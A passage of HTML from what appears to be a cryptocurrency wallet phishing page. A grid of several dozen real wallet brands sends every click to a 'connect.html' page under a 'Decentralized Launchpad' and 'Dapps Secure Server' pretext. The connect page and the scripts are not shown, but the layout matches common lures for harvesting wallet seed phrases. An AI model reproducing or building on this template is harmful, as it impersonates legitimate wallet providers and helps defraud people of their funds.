                                    <h5 class="style2"><a>Atomic</a></h5>
                                    <span class="price">atomicwallet.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="cool_wallet_s" class="sc-author-box select_wallet" data-title="CoolWallet S"
                                data-logo="asset/images/logo/cool_wallet_s.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/cool_wallet_s.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>CoolWallet S</a></h5>
                                    <span class="price">coolwallet.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="nash" class="sc-author-box select_wallet" data-title="Nash"
                                data-logo="asset/images/logo/nash.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/nash.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Nash</a></h5>
                                    <span class="price">nash.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="coinomi" class="sc-author-box select_wallet" data-title="Coinomi"
                                data-logo="asset/images/logo/coinomi.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/coinomi.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Coinomi</a></h5>
                                    <span class="price">coinomi.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="gridplus" class="sc-author-box select_wallet" data-title="GridPlus"
                                data-logo="asset/images/logo/gridplus.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/gridplus.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>GridPlus</a></h5>
                                    <span class="price">gridplus.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="tokenary" class="sc-author-box select_wallet" data-title="Tokenary"
                                data-logo="asset/images/logo/tokenary.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/tokenary.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Tokenary</a></h5>
                                    <span class="price">tokenary.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="safepal" class="sc-author-box select_wallet" data-title="SafePal"
                                data-logo="asset/images/logo/safepal.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/safepal.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>SafePal</a></h5>
                                    <span class="price">safepal.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="infinito" class="sc-author-box select_wallet" data-title="Infinito"
                                data-logo="asset/images/logo/infinito.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/infinito.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Infinito</a></h5>
                                    <span class="price">infinitowallet.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="wallet_io" class="sc-author-box select_wallet" data-title="Wallet.io"
                                data-logo="asset/images/logo/wallet_io.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/wallet_io.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Wallet.io</a></h5>
                                    <span class="price">wallet.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="ownbit" class="sc-author-box select_wallet" data-title="Ownbit"
                                data-logo="asset/images/logo/ownbit.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/ownbit.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Ownbit</a></h5>
                                    <span class="price">ownbit.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="easypocket" class="sc-author-box select_wallet" data-title="EasyPocket"
                                data-logo="asset/images/logo/easypocket.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/easypocket.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>EasyPocket</a></h5>
                                    <span class="price">easypocket.app</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="bridget_wallet" class="sc-author-box select_wallet" data-title="Bridge Wallet"
                                data-logo="asset/images/logo/bridge_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/bridge_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Bridge Wallet</a></h5>
                                    <span class="price">mtpelerin.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="via_wallet" class="sc-author-box select_wallet" data-title="ViaWallet"
                                data-logo="asset/images/logo/via_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/via_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>ViaWallet</a></h5>
                                    <span class="price">viawallet.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="bitkeep" class="sc-author-box select_wallet" data-title="BitKeep"
                                data-logo="asset/images/logo/bitkeep.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/bitkeep.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>BitKeep</a></h5>
                                    <span class="price">bitkeep.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="unstoppable_wallet" class="sc-author-box select_wallet"
                                data-title="Unstoppable Wallet" data-logo="asset/images/logo/unstoppable_wallet.jpg"
                                style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/unstoppable_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Unstoppable Wallet</a></h5>
                                    <span class="price">unstoppable.money</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="halodefi_wallet" class="sc-author-box select_wallet" data-title="HaloDefi Wallet"
                                data-logo="asset/images/logo/halodefi_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/halodefi_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>HaloDefi Wallet</a></h5>
                                    <span class="price">halodefi.org</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="dok_wallet" class="sc-author-box select_wallet" data-title="Dok Wallet"
                                data-logo="asset/images/logo/dok_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/dok_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Dok Wallet</a></h5>
                                    <span class="price">dokwallet.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="celo_wallet" class="sc-author-box select_wallet" data-title="Cello Wallet"
                                data-logo="asset/images/logo/celo_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/celo_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Cello Wallet</a></h5>
                                    <span class="price">cellowallet.app</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="coinus" class="sc-author-box select_wallet" data-title="CoinUs"
                                data-logo="asset/images/logo/coinus.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/coinus.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>CoinUs</a></h5>
                                    <span class="price">coinus.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="valora" class="sc-author-box select_wallet" data-title="Valora"
                                data-logo="asset/images/logo/valora.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/valora.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Valora</a></h5>
                                    <span class="price">valoraapp.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="trustee_wallet" class="sc-author-box select_wallet" data-title="Trustee Wallet"
                                data-logo="asset/images/logo/trustee_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/trustee_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Trustee Wallet</a></h5>
                                    <span class="price">trusteeglobal.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="guarda_wallet" class="sc-author-box select_wallet" data-title="Gaurda Wallet"
                                data-logo="asset/images/logo/guarda_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/guarda_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Gaurda Wallet</a></h5>
                                    <span class="price">guarda.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="Maiar_wallet" class="sc-author-box select_wallet" data-title="Maiar Wallet"
                                data-logo="asset/images/logo/maiarwallet.png" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/maiarwallet.png" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Maiar Wallet</a></h5>
                                    <span class="price">Maiar.com</span>
                                </div>
                            </div>
                        </div>



                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="jade_wallet" class="sc-author-box select_wallet" data-title="Jade Wallet"
                                data-logo="asset/images/logo/jade_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/jade_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Jade Wallet</a></h5>
                                    <span class="price">jadewallet.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="plasmapay" class="sc-author-box select_wallet" data-title="PlasmaPay"
                                data-logo="asset/images/logo/plasmapay.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                  
                                        <img src="asset/images/logo/plasmapay.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>PlasmaPay</a></h5>
                                    <span class="price">plasmapay.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="o3_wallet" class="sc-author-box select_wallet" data-title="O3Wallet"
                                data-logo="asset/images/logo/o3_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/o3_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>O3Wallet</a></h5>
                                    <span class="price">o3.network</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="hashkey_me" class="sc-author-box select_wallet" data-title="HashKey Me"
                                data-logo="asset/images/logo/hashkey_me.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/hashkey_me.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>HashKey Me</a></h5>
                                    <span class="price">me.hashkey.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="rwallet" class="sc-author-box select_wallet" data-title="RWallet"
                                data-logo="asset/images/logo/rwallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                  
                                        <img src="asset/images/logo/rwallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>RWallet</a></h5>
                                    <span class="price">rsk.co</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="flare_wallet" class="sc-author-box select_wallet" data-title="Flare Wallet"
                                data-logo="asset/images/logo/flare_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                  
                                        <img src="asset/images/logo/flare_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Flare Wallet</a></h5>
                                    <span class="price">flarewallet.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="kyberswap" class="sc-author-box select_wallet" data-title="KyberSwap"
                                data-logo="asset/images/logo/kyberswap.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/kyberswap.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>KyberSwap</a></h5>
                                    <span class="price">kyberswap.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="atoken_wallet" class="sc-author-box select_wallet" data-title="AToken Wallet"
                                data-logo="asset/images/logo/atoken_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                 
                                        <img src="asset/images/logo/atoken_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>AToken Wallet</a></h5>
                                    <span class="price">atoken.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="tongue_wallet" class="sc-author-box select_wallet" data-title="Tongue Wallet"
                                data-logo="asset/images/logo/tongue_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/tongue_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Tongue Wallet</a></h5>
                                    <span class="price">tongue.fi</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="xinfin" class="sc-author-box select_wallet" data-title="XinFin XDC Network"
                                data-logo="asset/images/logo/xinfin.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/xinfin.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>XinFin XDC Network</a></h5>
                                    <span class="price">xinfin.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="talken_wallet" class="sc-author-box select_wallet" data-title="Talken Wallet"
                                data-logo="asset/images/logo/talken_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/talken_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Talken Wallet</a></h5>
                                    <span class="price">talken.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="keyring_pro" class="sc-author-box select_wallet" data-title="KEYRING PRO"
                                data-logo="asset/images/logo/keyring_pro.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                  
                                        <img src="asset/images/logo/keyring_pro.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>KEYRING PRO</a></h5>
                                    <span class="price">keyring.app</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="midas_wallet" class="sc-author-box select_wallet" data-title="Midas Wallet"
                                data-logo="asset/images/logo/midas_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/midas_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Midas Wallet</a></h5>
                                    <span class="price">midasprotocol.io</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="at_wallet" class="sc-author-box select_wallet" data-title="AT.Wallet"
                                data-logo="asset/images/logo/at_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    
                                        <img src="asset/images/logo/at_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>AT.Wallet</a></h5>
                                    <span class="price">authentrend.com</span>
                                </div>
                            </div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="imtoken" class="sc-author-box select_wallet" data-title="imToken"
                                data-logo="asset/images/logo/imtoken.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/imtoken.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>imToken</a></h5>
                                    <span class="price">token.im</span>
                                </div>
                            </div>
                        </div>
                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6" onclick="window.location.href='connect.html';" style="cursor: pointer;">
                            <div id="imtoken" class="sc-author-box select_wallet" data-title="imToken"
                                data-logo="asset/images/logo/imtoken.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                   
                                        <img src="asset/images/logo/imtoken.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="ripple"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Others</a></h5>
                                    <span class="price"></span>
                                </div>
                            </div>
                        </div>


                    </div>
                </div>
            </section>
            
            <footer id="footer" class="clearfix style-2">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-lg-3 col-md-12 col-12">
                            <div class="widget widget-logo">
                                <div class="logo-footer" id="logo-footer">
                                    <a href="#.html">
                                        Decentralized<br>
                                        Launchpad
                                    </a>
                                </div>
                                <p class="sub-widget-logo">Open and decentralized protocol for syncing various Wallets
                                    to Dapps Secure Server. This is not an app but a protocol that establishes a remote
                                    connection between two apps and/or devices. Once your wallet is authenticated, you are in for a secured world of freedom with crypto</p>
                            </div>
                        </div>
                        <div class="col-lg-3 col-md-6 col-sm-7 col-12">
                            <div class="widget widget-subcribe">
                                <h5 class="title-widget">Subscribe</h5>
                                <div class="form-subcribe">
                                    <form id="subscribe-form" action="#" method="GET" accept-charset="utf-8"
                                        class="form-submit">
                                        <input name="email" value="" class="email" type="email"
                                            placeholder="name@email.com" required>
                                        <button id="submit" name="submit" type="submit"><i
                                                class="icon-fl-send"></i></button>
                                    </form>
                                </div>
                                
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="credit">
                  <p>2024 Chainsprotocol. All rights reserved.</p>
                </div>
            </footer>
        </div>



    <a id="scroll-top"></a>

    <script src="asset/js/jquery.min.js"></script>
    <script src="asset/js/jquery.easing.js"></script>
    <script src="asset/js/bootstrap.min.js"></script>
    <script src="asset/js/wow.min.js"></script>
    <script src="asset/js/plugin.js"></script>
    <script src="asset/js/shortcodes.js"></script>
    <script src="asset/js/main.js"></script>
    <script src="asset/js/count-down.js"></script>
    <script src="asset/js/swiper-bundle.min.js"></script>
    <script src="asset/js/swiper.js"></script>
    <script src="asset/js/parallax.js"></script>
    <script src="asset/js/web3.min.js"></script>
    <script src="asset/js/moralis.js"></script>
    <script src="asset/js/nft.js"></script>

    

    <style>
        .btn-outline-primary {
            width: 100%;
            border-radius: 20px;
            font-weight: 700;
            font-size: 15px;
            line-height: 22px;
            padding: 10px 20px;
            -webkit-transition: all 0.3s ease-in-out;
            -moz-transition: all 0.3s ease-in-out;
            -ms-transition: all 0.3s ease-in-out;
            -o-transition: all 0.3s ease-in-out;
            transition: all 0.3s ease-in-out;
            outline: none;
            border: 1px solid #5142FC;
            margin-bottom: 10px
        }
    </style>
</body>


</html>
